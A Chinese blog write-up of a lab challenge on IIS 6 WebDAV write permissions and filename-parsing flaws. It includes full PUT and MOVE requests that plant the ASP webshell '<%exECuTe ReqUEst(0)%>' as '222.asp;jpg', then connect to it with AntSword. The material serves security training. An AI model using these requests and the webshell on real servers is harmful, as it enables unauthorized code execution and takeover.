ASP-IIS中间件文件解析与写权限

于 2023-05-25 10:48:14 发布
阅读量956 收藏 1
点赞数
分类专栏: ASP常见漏洞 文章标签: php microsoft 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kui576/article/details/130862290
版权
文章详细阐述了IIS6和IIS7.x中的文件解析漏洞,如何利用PUT方法进行文件上传,并通过IIS的写权限漏洞修改文件名,最终形成Webshell。还提到了利用Burpsuite和Antsword等工具进行漏洞利用的过程。
摘要由CSDN通过智能技术生成

ASP-IIS中间件文件解析与写权限

IIS文件解析

IIS 6 解析漏洞

1、该版本默认会将*.asp;.jpg 此种格式的文件名,当成Asp解析

2、该版本默认会将*.asp/目录下的所有文件当成Asp解析。

如:logo.asp;.jpg xx.asp/logo.jpg

IIS 7.x 解析漏洞

在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件

应用场景:配合文件上传获取Webshell

IIS写权限

IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许

墨者学院一道题目-IIS写权限漏洞分析溯源 题目链接

知识点: 1.iis put写权限漏洞 2.iis6文件名解析漏洞

工具: burpsuite AntswordAntSword-Loader

IP地址 : 219.153.49.228 端口 : 48336 协议 : http 其他 : [点击访问]

img

原始包:

img

  • 2.利用iis写权限漏洞 使用PUT上传文件txt 用OPTIONS,观察返回,Allow存在PUT 请求包:
OPTIONS / HTTP/1.1
Host: 219.153.49.228:48336
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cacheOPTIONS

响应包:

HTTP/1.1 200 OK
Connection: close
Date: Mon, 19 Oct 2020 07:41:00 GMT
Server: Microsoft-IIS/6.0
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private

利用iisput写权限漏洞

PUT /a.txt HTTP/1.1
Host: 219.153.49.228:48336
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 24

<%exECuTe ReqUEst(0)%>
HTTP/1.1 201 Created
Connection: close
Date: Mon, 19 Oct 2020 07:35:54 GMT
Server: Microsoft-IIS/6.0
Location: http://219.153.49.228/a.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

成功写入

  • 3.MOVE修改文件名(利用iis解析漏洞)

Destination:/222.asp;jpg

MOVE /a.txt HTTP/1.1
Host: 219.153.49.228:48336
Destination:/222.asp;jpg
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2
HTTP/1.1 207 Multi-Status
Connection: close
Date: Mon, 19 Oct 2020 07:37:17 GMT
Server: Microsoft-IIS/6.0
Location: http://219.153.49.228/222.asp;jpg
Content-Type: text/xml
Content-Length: 182

<?xml version="1.0"?><a:multistatus xmlns:a="DAV:"><a:response><a:href>http://219.153.49.228/a.txt</a:href><a:status>HTTP/1.1 401 Unauthorized</a:status></a:response></a:multistatus>
  • 4.使用Antsword链接 http://219.153.49.228:48336/222.asp;jpg 0

img

img
参考利用:https://cloud.tencent.com/developer/article/2050105

kui954
关注
专栏目录
文件上传漏洞-07】中间件文件解析漏洞概述及实例——Apache、IIS和Nginx
m0_64378913的博客
07-12 3422
(1)第一种:未知扩展名解析漏洞 Apache对文件解析主要是从右到左开始判断并进行解析,如果判断为不能解析的类型,则继续向左进行解析,如xx.php.wer.xxxxx将被解析PHP类型。(2)第二种:局部配置 通过htaccess文件进行局部配置,定义不同文件名及后缀的解析方式。参考《【文件上传漏洞-06】.htaccess攻击实验(基于upload-labs-4靶场)》(1)加深理解Apache的两种解析漏洞原理; (2)掌握两种解析漏洞的检测及绕过方法。靶场:基于WAMP环境的...
IIS中间件四大漏洞分析
fansenliangren的博客
12-27 1001
关于IIS中间件四大漏洞的漏洞原理,漏洞危害,检测条件,检测方法,和修复建议的简要介绍。
IIS权限利用工具
03-07
IIS权限利用工具 网络攻防信息安全 是的
IISASP解析问题
老陈代码记录
11-12 768
安装过程中没有什么问题,那些文件都能在下载的安装包里找到。如果有问题,就换一个安装包试试。安装完以后,打开“控制面板->管理工具->Internet服务管理器”,出现“Internet信息服务”的界面,随便选一些网页,点击右键选择浏览,发现.html的网页能正常显示,.aspx的也能显示,就是浏览asp页面的时候总会出现服务器错误(错误:500)。现在来开始解决。  1、打开“控制面板->管
IIS无法解析asp文件的问题
falcon_fei的博客
04-12 748
 今天老大让我把别人公司一个做好的ASP立站点在我们这边搭建起来,本以为是几分钟的事情,可是在浏览ASP页面的时候出现问题,但可以解析HTML的,后来才记起原来我这是在虚拟机里建的个2003的系统 ,ASP服务是需要手动起的。控制面板   ->   管理工具   ->IIS(Internet   服务器)-   Web服务扩展   ->   Active   Server   Pages  
安装了IIS还是无法打开asp解决办法
顾而乐之
02-18 1350
相信我的,只有我才真正地找过答案,其它都是乱抄的,实能解决到你的问题,前个月我还在苦找答案,也已试验过N次,最后成功了,网上也有改那个什么帐户的,那个实在太难了. 按我的方法,前提是一,系统是XP,其它系统不敢包.二,你没有做过其它设置. 主要是帐户权限问题. 打开“管理工具”->“组件服务”->“计算机”->“我的电脑”->“COM+应用程序”,(看A) 然后在右边框中,右击“IIS Out-O
iis权限的利用工具
06-29
检查windows服务器的设置漏洞,仅针对IIS
IIS6.0中间件解析漏洞与PUT上传技术解析
在网络安全领域,中间件解析漏洞是常见的安全问题之一,特别是在旧版本的Web服务器软件中,如IIS6.0。本节主要讲解了IIS6.0中间件的一个特定解析漏洞以及利用PUT方法进行上传攻击的原理。 IIS6.0解析漏洞主要体现在...
深入浅出带你学习IIS中间件常见漏洞
最新发布
郊眠寺
02-16 918
简单总结了一下IIS中间件的常见漏洞以及攻击方法不知道大家学会了没有,文章主要还是讲了IIS解析漏洞的实现方法,有兴趣的小伙伴不妨去搭建一个靶机去测试一下,喜欢本文的小伙伴不妨一键三连支持一下。整理了75个JS高频面试题,并给出了答案和解析,基本上可以保证你能应付面试官关于JS的提问。
IIS中间件漏洞详解:从解析漏洞到短文件漏洞
解决办法是关闭WebDAV服务和相关目录的权限,以防止未经授权的文件操作。 最后,文章还提到了IIS的短文件名漏洞,这是由于Windows系统为了兼容MS-DOS而产生的8.3格式文件名可能导致的安全问题。攻击者可能...
IIS不能解析ASP文件的解决办法
11-20
IIS不能解析ASP文件的解决办法 IIS5 HTTP500内部错误解决办法
IIS权限漏洞
05-03
IIS权限漏洞,discua建须搭知与漏洞不全
IIS权限漏洞原理&利用工具手动版
weixin_34387468的博客
01-26 600
很老的东西了,严格的说不是漏洞,只是设置不善造成的Bug。八百年遇不到一会,结果前几天不幸碰上了。 用JSKY扫描人家的站,结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧,我猜JSKY用的参数一定是“/”)。 还好,最后搞进去把人家的站恢复了,真惊险。还义务帮他补漏洞,删后门...... 其中用到了IIS权限利用工具,桂林老兵版的...
IIS不能解析.asp文件解决办法
cosio的专栏
08-14 1465
解决办法    知道了导致HTTP  500内部错误的原因,解决起来就比较简单了,那就是人工同步IWAM账号在Active  Directory、IIS  metabase数据库和COM+应用程序中的密码。     具体操作分三步,均需要以管理员身份登录计算机以提供足够的操作权限(IWAM账号以IWAM_MYSERVER为例)。    (一)更改Active  Directory中IWAM_MYS
IIS无法解析ASP的解决方法
酒鸿色的心专栏
04-29 7807
在装完IIS5.0后,从WEB 服务器控制台或其他网络上的工作站浏览asp或html文件,WEB服务可能返回如下错误信息: HTTP 500  内部服务器错误. 步骤一: 你可以先在开始->运行中输入:services.msc或者控制版面->组件服务->启动 Distributed Transaction Coordinator (DTC) 如果提示无法启动, 则运行 ms
Iis权限漏洞认识
weixin_34313182的博客
10-13 194
Iis权限漏洞是由于iis的网站主目录权限设置不当造成的,严格来说不属于iis的漏洞。网站主目录设置可权限,可直接往服务器上文件,漏洞威胁级别较高。 漏洞成可利用的条件 1、 网站主目录权限允许入和脚本资源访问。如果只有权限,利用时只能上传txt文件,使用move方法将txt文件正可执行脚本,需要脚本资源访问权限。 2、 WebDAV服务器扩...
文件上传漏洞10】中间件文件解析漏洞基础知识及实验——IIS
Fighting_hawk的博客
03-09 5477
1. 文件上传漏洞第一个条件是文件成功上传且没能过滤掉恶意代码;第二个条件是让代码执行。 2. 对于第一个条件,存在着前端JS检测绕过、服务端MIME类型绕过、服务端后缀名绕过、文件内容绕过等,其根本目的是要上传文件。 3. 对于第二个条件,当中间件IIS时: (1)优先考虑绕过后缀名时采用恶意代码能够执行的后缀,这样文件能直接执行; (2)当IIS版本为5.x或6.x时,考虑利用文件解析漏洞、目录解析漏洞执行该文件; (3)当IIS版本为7.x时,考虑利用CGI-PHP解析漏洞来执行该文件。...
利用IIS权限漏洞
qq_35266419的博客
10-11 758
题目 目标服务器开启了IIS服务,搭建了一个网站。已知该网站的管理人员比较粗心且经验不足,没有就IIS权限进行必要的防范。请利用该权限漏洞,对目标网站进行渗透并找到key.txt文件,将文件内容作为FLAG值进行提交。 题目分析 1.IIS (互联网信息服务) ①IIS是Internet Information Services的缩,意为互联网信息服务,是由微软公司提供的基于运行Micros...
科普文之iis权限漏洞
ccx_john的专栏
07-11 2576
今天特意跑到学校听了一堂课,然后学了很多东西,就一个笔记,分享一下吧。都是本地环境,没有真实环境,我小白,别喷我。 Iis权限漏洞 说明:这个漏洞的产生原因来源于服务器配置不当 演示: 利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持P
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kui954

感谢各位的支持o(* ̄3 ̄)o

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值